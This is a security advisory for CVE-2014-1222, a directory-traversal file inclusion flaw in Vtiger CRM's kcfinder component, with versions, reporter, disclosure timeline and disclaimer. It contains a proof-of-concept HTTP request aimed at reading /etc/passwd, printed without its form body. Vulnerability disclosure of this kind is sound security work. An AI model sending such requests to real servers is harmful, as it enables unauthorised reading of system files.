Tried, Tested and Proven

Vulnerability title: Local File Inclusion In Vtiger CRM

CVE: CVE-2014-1222
Vendor: Vtiger
Product: CRM
Affected version: Vtiger 5.4.0, 6.0 RC & 6.0.0 GA
Fixed version: Vtiger 6.0.0 Security patch 1
Reported by: Jerzy Kramarz


A local file inclusion vulnerability was discovered in the ‘kcfinder’ component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose contents of arbitrary files.

The following request is a Proof-of-Concept for retrieving /etc/passwd file from remote system.

POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4
Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off


Note: In order to exploit this vulnerability an attacker has to be authenticated.


This vulnerability gives an attacker the ability to read local files from the server filesystem.


Exploit code is not required.

Vendor status:

23/12/2013 Advisory created
03/01/2014 Vendor contacted
14/01/2014 CVE obtained
27/01/2014 Vendor contact reattempted
10/02/2014 Vendor working on a fix
12/02/2014 Fix released
13/02/2014 Fix confirmed
11/03/2014 Published

Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.


The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.